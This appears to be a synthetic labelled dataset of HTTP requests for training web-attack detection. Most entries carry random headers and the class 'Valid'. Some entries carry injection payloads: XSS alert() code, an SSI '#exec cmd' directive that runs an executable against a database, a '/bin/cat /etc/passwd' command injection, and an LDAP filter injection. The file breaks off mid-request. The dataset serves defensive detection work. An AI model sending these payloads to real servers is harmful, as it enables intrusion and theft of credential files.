Pragma: no-cache
Proxy-Authorization: NTLM czJlaWRhZGlsc2w1YTNod3Zhc2Zoc2hyeXR0Y2EwS3dlcmFtdzdPZmVjZW5sSGQ=
Authorization: Digest uri=http://tqodcT1n.de/ut7e/tBtaq/yoetvrnT/ontae5M/stYggc02.swf
Range: -9,-905
Referer: /1ce1ro/4etoi/Mafkh/eilo.php
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 4.0; bq-sm; rv:0.4.1) Gecko/74296022
UA-CPU: Sparc
UA-Disp: 192,906,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4283x806
Via: 4.0 15.164.155.244:1, 6.1 89.61.105.121, 6.0 www.srrot.html
Transfer-Encoding: deflate
Upgrade: euxuIj/1.3, tsocun/7.9, qixenp/6.5
Warning: 169 www.6hnqjthS.shtml "rnUhnrersbrs" "Mon, 16 Aug 04 18:32:04 UTC"
X-Forwarded-For: 145.209.171.178
X-Serial-Number: 5833814723
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4Y8kWimgvDWoyA=3665514&hneufMaealhaFho=2672512&VxmlBcdeg=dbCs&tsyhearhe=8440&NoP-=z&ouni=i<&detct0blbygnOd=618139

End - Id: 4147
Start - Id: 47763
class: XSS
GET /1ntraeoteranlVr/kin/ta1EEsh3o2saGsn/_7yautoexecstdinvFIDiGWk/eT-GWIhHmaHX/qxQpXO.php?chni7yese4ohh1=%26%7B%5Balert+++%28%27liw4ecoi%27%29%3B%5D%7D%3B&oaAaek2Lssor=t8uHrDpSTu&9onlg=20 HTTP/1.1
Host: 214.80.181.191
Connection: close
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 226.81.74.174
Cookie: tsyitttra=noeae;tdlhoi=nQXrd;htn9nz=+
Cookie2: $Version="9"
Date: Sat, 14 Aug 04 04:54:54 GMT
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: "k2AQpJ1pSje.7n@z"
If-None-Match: *
If-Range: *
Max-Forwards: 8914
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic b255ZnIxbDpuNWVvbg==
Range: -41921,082-
Referer: /onci85ba/edya.php3
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: jdmyCsIrn (ef-qSw; tICOqT; ek-aO6; euiS2H; ri4oRQ1d@)
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 0.9 www.knlhee8.css, 7.5 39.24.132.180, 6.4 www.raympan.htm
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47763
Start - Id: 17036
class: Valid
GET /wTJEg/kVnJPq/e8hlalta/gE/wj/FBCFclMe0xnwgetselect.html?hc=issr4gsel&na5acpeaidtmr=n4lw%3A%5D%7Ex5node%5Bll+i&on=i%7Csghl+y%5Ba+smhsri&oi=814292&5iuoie1tyHgtfrn=cee3s%295gehn8e&aeschctu=hiil9Unvmkosc&smVyes9m=aiogtm&0iceiv=i7ro7gnf%3D%3A%7Eh%3D&eshf=ptHUo1hyenHotfM&1trriyadooun=hge2enteJth63oa&eQotmsrh=reB%40Kvvdx0_&nldebIimdsto4aG=tCKFRQ_&preyuU=+Recreleakpsm HTTP/1.1
Host: 38.71.24.151
Connection: i5Swsx
Accept: text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: min-fresh=214
Client-ip: 130.92.206.240
Cookie: EXrG=6;hsrna9NOalf=Zawoaejtiarfdimn;dh=dext1n
Cookie2: $Version="8"
Date: Sat, 28 Jul 07 04:02:35 CET
ETag: W/"mbM4Q5pZuXGEl0e.UYh"
Expect: zw6kS
From: hSnyeyh@haTeaE0d.de
If-Modified-Since: Fri, 20 Jun 08 07:08:19 CET
If-Unmodified-Since: Fri, 04 Aug 06 20:05:26 GMT
If-Match: "d_FfbvrMZHniE8t"
If-None-Match: "3S@rcLtS4hhiDcI4"
If-Range: Sat, 02 Jan 10 12:53:30 GMT
Max-Forwards: 95
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: etoT lefruaR=btta3nc
Authorization: Basic ZEVzbzhpOmZub3I=
Range: 89911-8,-322138
Referer: /jtgalr/uh7go20/Earu9/oshtaoo/frgk.conf
TE: trailers,deflate,trailers
Trailer: Accept
User-Agent: ttrnn/4.1.1.6.6
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 486x328
Via: 4.1 www.Pbrpo.gif:0
Transfer-Encoding: oTnb; ocua=lu4ay0h
Upgrade: an5e/3.9, ubn5/9.2, 1enCH/8.4, mcnh/6.1
Warning: 315 12.241.17.56 "nrSnhri22eTkgrrM" 
X-Forwarded-For: 146.223.240.130
X-Serial-Number: 589600
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17036
Start - Id: 40349
class: SSI
POST /eollac0ptnleT4atee/8-1FjmDj1BBwY/RmYfinputk4/tSs1AXOvWCc/netcatsFXU6home/dXDfu.RSOfUzfoQh/FGEo/7nph-linkopdivIls3g-FbP6/eK.asmx? HTTP/1.1
Content-Length: 225
Content-Language: yTntl,ettuseh
Content-Encoding: gzip
Content-Location: /rnan.bin
Content-MD5: cmhwYWtud3VzcENrdTNlNw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Nov 04 04:09:15 GMT
Host: 201.45.60.243:80
Connection: close
Accept: video/quicktime;q=0.6
Accept-Charset: iso-2022-jp;q=0.0, windows-874;q=0.3, x-mac-hebrew
Accept-Encoding: deflate
Accept-Language: <!--#exec     cmd="c:\progra~1\cein9ae\asr\ktU2Ai.exe   d:\hEidy\www.genaraatle.org\eishe\database.mdb   /x exporttofoxpro"-->
Cache-Control: max-stale
Client-ip: 202.95.30.44
Cookie2: $Version="67"
Date: Wed, 02 Sep 09 12:07:22 CET
ETag: "kLdr97O6KOtjkNp-"
If-Match: "WjhkQDP-NZjw.o_Dg"
Max-Forwards: 34
Pragma: no-cache
Proxy-Authorization: Basic ckE3c2Q6UGlzdA==
Authorization: NTLM dGlib2xFc3FlM3NyZnR3ZXRvSTJycmRuUlJlZWFBa2hydW9oaXRlbWVudGU=
Referer: http://www.wwnadnq.net/loia/yv9lh7tr/tnR0io/7Tros.dll
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/9.3 (Windows; U; Windows NT 1.2; 1y-i2; rv:2.2.8) Gecko/50051754
UA-Color: color16
Via: FTP/9.2 213.206.19.122, 7.6 www.s7zlEo.gif:864
Transfer-Encoding: gzip

oeP=l&hmvE8egi4gLu=u6nY.N&rod7wuAtntzDo=1980&lT=ioEo&taih8=twp-nheo&DSsWUPHh=44&snn6pth=mrottOfTo&ttea=:kla&go=268&kne0Tnntaphpy=i&3loisstrtlian5o=iiztn;y >uopenpn&s9cfa=187534&stwsege6=507788477&iafnBssirqeumr=ph<$

End - Id: 40349
Start - Id: 12857
class: Valid
GET /szCpEI7xG-X/u_RekmI@xaXyBi3YrsUe/6P/nSUsIEI.2/8t3r..f-G/iYSA@5uu1tP_KFyg/ix/3ormEiurVaheeOsh/tua6.php4?s1tssoatt1p=kbxp_+y9%3Drrfqir6otLn&eggeetetp=hbQai7fB0HtR&eQEnineeltck=70&syipizti=oys6q583s&iveh0meRgr=eiyeea HTTP/1.1
Host: 88.75.202.124
Connection: close
Accept: */*
Accept-Charset: euc-cn, euc-kr;q=0.0
Accept-Encoding: 
Accept-Language: Zhn5t-uo, ao-raoeea, z3r-as6hent, a-NuEteom;q=0.2, 8qul-3pme
Cache-Control: only-if-cached
Client-ip: 184.111.50.185
Cookie: eji1a=191170;mwS=ts
Cookie2: $Version="98"
Date: Sat, 12 Jul 08 22:27:14 CET
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: 100-continue
From: iirE@eyRmP2.biz
If-Modified-Since: Wed, 26 Oct 05 23:37:17 GMT
If-Unmodified-Since: Tue, 16 Mar 10 03:14:06 CET
If-Match: *
If-None-Match: *
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 57
MIME-Version: 7.5
Pragma: 9aDe='gypl'
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: Digest qop=auth
Range: -212,74-
Referer: /ismfs/oheseet/e3xhnc/iIoo/hwni.wmn
TE: trailers,trailers,chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/9.8 (X11; U; Solaris 1.5; hn-Sk; rv:1.3.2) Gecko/37807069
UA-CPU: Sparc
UA-Disp: 662,803,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: FTP/1.1 www.Spissoi.gif, HTTP/8.6 132.236.131.185
Transfer-Encoding: compress
Upgrade: zoadt/1.0
Warning: 241 www.rpshelf.shtml "ImulXdfh" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12857
Start - Id: 36726
class: OsCommanding
GET /dtt/ordldfr8iadecTl/ixii/eri.css?eh=sspRl&ova0fsAlsm4wn=060476417&fheFhlrlidi=%7C+++++%2Fbin%2Fcat++++%2Fetc%2Fpasswd%2500.html&enataegt=021076&open2LexecOwh=6&mI@libformbgsoundJs3w@a=a&axooruhnnIkmcis=erxsaotooka&X8FWaUu@=114025&2u0y=3&rcp9NK7Vinsert=5156&gYnTT4xtermTI=92288963&dnoj=audEVd HTTP/1.0
Host: 45.36.127.229
Connection: 1r9rntc
Accept: image/*
Accept-Charset: utf-7;q=0.1
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 38.98.48.204
Cookie: ans=1545914;rsdoEeHdeeojon=komose;lm9j=e%~itmp@nL;Ep6eeniTe=ogW-aMLrrg1.
Cookie2: $Version="8"
Date: Sat, 21 Feb 04 16:15:02 GMT
ETag: "hdxb06ek3SSITXtEz"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 18 Nov 06 16:31:32 CET
If-Unmodified-Since: Mon, 29 May 06 12:53:58 GMT
If-Match: "Q-SweOR6ExaN0vBgr3"
If-None-Match: *
If-Range: Wed, 04 Aug 04 03:54:34 CET
Max-Forwards: 9269
MIME-Version: 6.4
Pragma: btudd8=afse
Proxy-Authorization: Basic bVhudGVvbDplU3Rtc3I=
Authorization: stOa hhlo=wwtuscx0
Range: 17833-,074264-927,-3
Referer: /tiPap.pdf
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/0.8 (Windows; U; Win98 7.3; e9-ie; rv:4.5.2) Gecko/32125433
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 656x0255
Via: FTP/1.9 www.a8n6pa.css:5012
Transfer-Encoding: uenvo
Warning: 356 121.238.97.82 "SynhtwQveostoh" "Sat, 03 Dec 05 18:43:40 CET"
X-Forwarded-For: 18.24.168.27
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36726
Start - Id: 16167
class: Valid
GET /yk_RpefjXU6n2a7F5O/f63WE55RMNB0/iyntgp/oQRv/l9CVbyt8gEfIe/uY-uikMLz3h5Rnkx/vJ.mdb? HTTP/1.1
Host: 116.75.193.223
Connection: close
Accept: */*
Accept-Charset: windows-1251, gb2312
Accept-Encoding: compress;q=0.0, identity;q=0.3, deflate
Accept-Language: *
Cache-Control: dteisY6a='hxsaq'
Client-ip: 90.89.67.215
Cookie: Dosnmir=eeggtsDtauzeh1g;54s8fhpcaenu=eswos6yeOh8;oe2saiE6=5060;inhaOsnetptRaoo=71071;oiestertjt4toa=325643;eabfA0gbbut4nl=l49ajS
Cookie2: $Version="176"
Date: Thu, 28 Jan 10 13:05:31 UTC
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: mEck5@aosi.it
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Sat, 21 Feb 09 13:42:32 UTC
If-Match: *
If-None-Match: *
If-Range: "aGd9by7Gzu@adqIP"
Max-Forwards: 407
MIME-Version: 7.0
Pragma: hrth=0qf02D
Proxy-Authorization: Digest username="nFeSct7"
Authorization: eTnft 6oio6=cetm
Range: -0401,-5888,85828-61
Referer: http://www.stedol.net/adaeyar/9Cch3/rot8/lsrlehk/bpi7lt.txt
TE: deflate;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 6.6; ei-1r; rv:4.3.7) Gecko/33739815
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: FTP/7.0 www.e3upy9e.tiff, 1.5 193.84.239.182, 7h5cw/0.4 242.245.55.87
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 76018211526723
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16167
Start - Id: 22604
class: Valid
GET /iahepbnm2V/x@ODLw18XNUZ10q/sc@L7miDIGE/6UJi7h.dll?mAeseaann=kiT%25ehndtAler&fnoi6tloa=Ej7octMeebudo&tuwP6a27arieei=seaumisdeaEi&hotEihe=eavbscriptn%3Bet%3Ale%5B8var&ceIstdn8u3aH=dhwindow.openua%3DHado&6ti=eO7bwcqbEUG&tdl=ope5w&UAm@i=%2Fw&aUpsrI=786165&xd5eiowf5ee=l6KgEJmG HTTP/1.0
Host: www.nea2re7.be:52
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: fwiec8e-bihgenc;q=0.5, ido6lme-Ra;q=0.8, n-wasuOd, sce3b-fqe
Cache-Control: no-store
Client-ip: 182.155.75.50
Cookie: 2eg=7975;beaOmtzmseaMrCN=tGrxMcvfi3q;sntanrtesji=j/n;dhetocyy3it=496;eat=4429103;Hehnamrdi9=30
Cookie2: $Version="31"
Date: Wed, 18 Oct 06 06:58:29 CET
ETag: W/"HIpjGzWlYEeZJNUjoVX"
Expect: 100-continue
From: tamegP8@NaDasMP.be
If-Modified-Since: Mon, 01 Aug 05 17:14:28 UTC
If-Unmodified-Since: Thu, 20 Sep 07 11:02:11 CET
If-Match: "Md-wd9IeQB1Uc2MG1Wg1"
If-None-Match: "uV9HXnS@5l94IMCkqnEu"
If-Range: Sat, 03 Dec 05 10:53:48 CET
Max-Forwards: 6784
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dTNpZWZzOElnanR5aWV3YXM1bHJlaHRtc2RyQzZzZGVvd3BpdHQ2emhsdA==
Authorization: Basic c2N0dHRpdG46aW5laXNocg==
Range: 5809-2058
Referer: http://m2tar.be/hE9al/a4eroe.nsf
TE: trailers
Trailer: Expect
User-Agent: m1UQWzc http://www.o6nss.de
UA-CPU: MIPS
UA-Disp: 9434,874,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6216x6265
Via: HTTP/0.0 197.122.195.28
Transfer-Encoding: eixxrt
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 246.209.203.242
X-Serial-Number: 705834569346
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22604
Start - Id: 38583
class: LdapInjection
GET /t5PuhrtN-6v7z0/@GCSEYy5/80fdEmpe9FI/rnMNfe3Nd5ckhoi/ea1smaetlnd.png?esfutrtLqt=18&uo1t=71874589&b-PLZWxg6=7&PXIM=6&8ns3en=Aor%29yt5uctm%5C%40Eid&nrtshpUo2moik=927531&Jra8=%29+++%28+%7C+++%28+++cn%3D*o++%27brien*%29%28mail+%3D*o+++%27brien*++%29+++&nodwt1eiihct9B=2074182&iaazanfcdzNNifi=89582058&W6-43u=%40s4Aechoda5xphp&iehuaneh=axs6&A7Ri6GU%usM=5548950&aiv=ij_hvmZUSgGE&M2HU1fp=xet&8Qx0y=e HTTP/1.1
Host: www.coitcgTi6.uk
Connection: iTeetyni
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: ntelR='4jgcyni'
Client-ip: 97.13.224.109
Cookie: rK1R=68z04H-eW;diuhtxemw6AtaHu=sm;zQjl-=tr8qrrlh;iwayjpnnewlllo=91
Cookie2: $Version="7"
Date: Sun, 23 Jan 05 03:47:50 UTC
ETag: "97Y.or_-IwjPkck"
Expect: 100-continue
From: etac@sxisfet5in.ch
If-Modified-Since: Sat, 13 Nov 04 05:39:12 UTC
If-Unmodified-Since: Tue, 24 Feb 04 19:10:41 CET
If-Match: "@DOt1q1ucN0b6.D1"
If-None-Match: *
If-Range: "FsQo7Nu46.9rxgiC"
Max-Forwards: 4753
MIME-Version: 6.9
Pragma: 8='nesf'
Proxy-Authorization: Digest nc=862e2FDb
Authorization: Digest opaque="rseh"
Range: -5
Referer: http://www.2soke2.net/reedyp/cejt/tedti/eoOoqcc/theEat.dll
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (compatible; Konqueror/0.1; Open BSD i386; Lsn8oeihi; heio)
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7804x6342
Via: rek/3.4 www.mSe2.js, 2.2 164.223.38.240
Transfer-Encoding: sTWCa; 9io8=RelT
Upgrade: ksu/7.2, ear/3.1
Warning: 706 www.lsrln.js "rhiu597lgsrdqtlt2er" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38583
Start - Id: 29404
class: Valid
GET /Y.NcFQN/eU3HV8Ef8gu/tDXCfHbd4TCxBEhj16D/9f.js? HTTP/1.0
Host: 81.49.93.186
Connection: e5iuD
Accept: image/gif, audio/basic;q=0.1, text/*;q=0.8
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 152.201.222.227
Cookie: eKftsonor=eL21cCQ
Cookie2: $Version="0"
Date: Sat, 17 Jan 09 03:09:03 GMT
ETag: W/"Ms0L..T-rIrmu2RDg"
Expect: 100-continue
From: onTs@ajeeiGu.com
If-Modified-Since: Thu, 14 Apr 05 05:02:08 GMT
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "Z0cy_sLHNeH6ZLUVm."
If-None-Match: *
If-Range: Wed, 21 Mar 07 17:07:29 GMT
Max-Forwards: 5243
MIME-Version: 3.4
Pragma: m=8i
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: Digest nonce
Range: 61375-,6799-
Referer: http://www.iv3tfO.org/rehage/ttcqaqge/ejNdacs.tar.gz
TE: trailers,deflate
Trailer: Range
User-Agent: Mozilla/5.7 (compatible; Konqueror/7.8; Win 9x; zeia5n2igi; nhjaxrra; rqWt5arrls)
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0011x3310
Via: 6.1 1.243.110.61
Transfer-Encoding: identity
Upgrade: FmetTc/9.4, tDhhl/1.8, oiuvat/7.6
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 29404
Start - Id: 31168
class: Valid
GET /oC4yfOESI4BmTXFgyMuq/L0.MI4g6FBD/cd/EbdEp0siogphf/lheoe3kr73zibs.shtml?eefale=432&sysSt6=879674&tsnqap=5128768876&tufhsod=t&5pcetwm4ot=5541653&evsqgCWaNo=106327&Sos=v+je8e&rt5Vrcsy=epetca7sascriptsls+%27aatsystem&er=8&tn=escoembttnHotre&utihvrflirlhre=9635&smfsNaee=riO%27wuocAofioui&aotseaaawid3a=wEataxt%5Cnjwir HTTP/1.1
Host: 89.159.214.5:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: compress, compress;q=0.3, identity;q=0.7
Accept-Language: s7uLRn-ynt, otf-g;q=0.2, suzsL-vtHaysaG;q=0.3, nrale-pax0;q=0.4
Cache-Control: max-age=78278
Client-ip: 134.114.98.114
Cookie: 5roR=g2s;eeaCdarcOjh=h>0adi
Cookie2: $Version="352"
Date: Mon, 30 Oct 06 01:42:03 UTC
ETag: W/"Kl07z01Q5Zq@nnfKDGV"
Expect: rair
From: xdis0@redoex.de
If-Modified-Since: Sun, 16 Aug 09 01:09:11 CET
If-Unmodified-Since: Tue, 18 Jan 05 14:13:03 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Feb 08 11:59:30 CET
Max-Forwards: 65
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic dDg4eWxkOm1pbzV0
Authorization: Digest username="eu9aee0"
Range: 41-,7530-978
Referer: http://www.nqfse.uk/hsSrusF/eaqVswfo/naedaeb/aerIr/iQrenet.mp3
TE: chunked;q=0.2,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.3 (Windows; U; Win 9x 9.9; Fp-ew; rv:7.8.5) Gecko/29498888
UA-CPU: StrongARM
UA-Disp: 2491,001,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 085x6333
Via: igdEo/7.3 www.eehumoLp.shtml, raoyt/8.7 88.125.247.82
Transfer-Encoding: identity
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 047 www.AtoX9nes.js "hsmitves7S" "Sun, 30 Aug 09 10:25:13 CET"
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31168
Start - Id: 14489
class: Valid
GET /raw/eaadosol/aeliaanii1idejs.shtml? HTTP/1.0
Host: 229.174.75.239
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: OdAfde-haobmep;q=0.1, shlinbsd-tSbx, Cleg-kW, e-tyo;q=0.1, cnh6ash-N
Cache-Control: min-fresh=6916
Client-ip: 156.195.173.2
Cookie: q7Ghco=nih;30sm=52416403
Cookie2: $Version="838"
Date: Sat, 05 Apr 08 15:36:43 UTC
ETag: "QU9.rjcLWw9yyUMa"
Expect: ulijiif
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sun, 03 Jan 10 01:33:21 GMT
If-Unmodified-Since: Fri, 18 Nov 05 23:18:44 CET
If-Match: *
If-None-Match: "lpiWsGheC-4CrFXC"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.4
Pragma: nxtn='e9tiot'
Proxy-Authorization: NTLM ZW1mZWlhY3VteWZsYUlod3Nzc3ZrdGdyZ09sZWRnSWl0bA==
Authorization: NTLM Mm85QXI5Z3Rlc2Z3bnJkc3NmaVNmdW90MXBpb255cG9lMW4=
Range: 737195-
Referer: /1rIT2las/inn0yca4/rrardh/rswl9t/hpvsire.png
TE: chunked;q=0.6
Trailer: If-Unmodified-Since
User-Agent: eftpeankiddnh7gbtsS
UA-CPU: 68000
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2304x0310
Via: 1.8 www.otnw.jpg, FTP/9.9 www.rgi1pasn.png, FTP/8.6 www.cosa.htm
Transfer-Encoding: gzip
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 474 www.anislbri.html "nTdethnvs" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 58967727839058915929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14489
Start - Id: 27346
class: Valid
GET /inR@.aspx?4aKH=04637&tNtaDE=%7C%28de HTTP/1.0
Host: 164.65.74.24:80
Connection: c74O
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: max-age=4
Client-ip: 8.61.2.31
Cookie: PsTL=2;a0o8aoe2nzn=75346670;sb=5;azvrnd=~Tn9ceeksbd xml;Lreaeo=omxanor9s7s
Cookie2: $Version="3"
Date: Wed, 16 Dec 09 04:44:10 GMT
ETag: W/"K@FTc1m-7J7E3LL7cKCr"
Expect: 100-continue
From: irasr@udahB.net
If-Modified-Since: Wed, 24 Mar 04 21:29:30 UTC
If-Unmodified-Since: Thu, 31 Mar 05 04:44:50 UTC
If-Match: *
If-None-Match: "WHRUZEl3k6UXKMJJB"
If-Range: Thu, 20 Dec 07 13:45:39 CET
Max-Forwards: 777
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic b2FlYTpkaXR1aXJzcw==
Authorization: rtw7o5 tmlGaErZ=tpgd
Range: 990051-0235,8-,3996-58
Referer: /tih7wa/ntprtas5/2fec.jpeg
TE: trailers,deflate;q=0.9
Trailer: Max-Forwards
User-Agent: beeso (cuCHdg7XoM; ee547xd@)
UA-CPU: 68000
UA-Disp: 4083,795,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 904x688
Via: 1.7 www.ae8s.js, HTTP/5.4 90.9.66.56, 7aJdsz/4.0 163.170.108.25
Transfer-Encoding: efgIre
Upgrade: oygdhG/5.2, mkl/7.7, atrtbx/4.3, rRu4lt/4.7
Warning: 529 www.wNtetEts.png "ejsluW" "Sat, 14 Nov 09 06:42:38 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27346
Start - Id: 18411
class: Valid
GET /immVtcRRwPrMG0/48gorinput/3.Ae774pDzpobjectl/8NXfF4HL@_K6all4Nwrh.mdb?8madotks=%5C6&utt4aoe7isink=280&ana=51263218&io=e_VYV&FiL5RIjXIzn=auHmo&hTrrr=ia8ipclcrlgdha2&isnh9mw6=809475&rfoi=734&CfltioLt=s+ecsvcte%3Ei&Gfrom-0in=eacne%24%3D8lsr+t HTTP/1.0
Host: 217.218.117.255:89012
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 5j5ou-aOet8e47;q=0.9
Cache-Control: no-transform
Client-ip: 183.39.30.120
Cookie: ahsatTsiAhash=3344419;3lSoesIo=u6BYS;aa1nEuin=R1c;tocqgma=37GZh6r0UF;9PeanvHvonMwurt=e<
Cookie2: $Version="5"
Date: Thu, 29 Jun 06 08:56:02 CET
ETag: W/"MgltMTz0K8OY2ncAsiKt"
Expect: eeic
From: 1hniea@u4rmt.it
If-Modified-Since: Thu, 14 Dec 06 01:50:27 CET
If-Unmodified-Since: Sat, 21 Nov 09 11:16:02 UTC
If-Match: "3ylSXjEHkyAQe0LqLor9"
If-None-Match: *
If-Range: "Z87sXn.yxrThEZhW"
Max-Forwards: 128
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: Digest response="eC879ecDc5cdC68D8bFDA9bAE7DF5BB6"
Range: 0752-,8-,-9405
Referer: http://www.ejiItru.com/uQrs0M.asmx
TE: gzip,trailers
Trailer: Via
User-Agent: iBgcUYvrB http://www.ueszOaa.ch
UA-CPU: 68000
UA-Disp: 1388,0404,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 342x6218
Via: 7.3 225.218.64.138, HTTP/3.4 65.148.16.11:93750
Transfer-Encoding: identity
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 2956272403318008567
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18411
Start - Id: 35027
class: SqlInjection
GET /rrlomasnc3/d4coBOTQ3/nh59wj-hdiKry@.php4?tEbStxj=TH&nehwnquthystt=haalet3czt6tf&nv=8anluecQhn&ee1uoaihod7Fota=6760&Ytuo-iFt=ioihi&4cMurY8wtu-v=ubodnetntco7&ndtno0oa=41135466&0iweerdaaay=62&oDfhn=14214&woBooa=cialuw6cenHuugsk&othgeuSbjats0t=gmeR0-OHW3AD HTTP/1.1
Host: 51.220.235.213:389
Connection: close
Accept: text/*;q=0.7
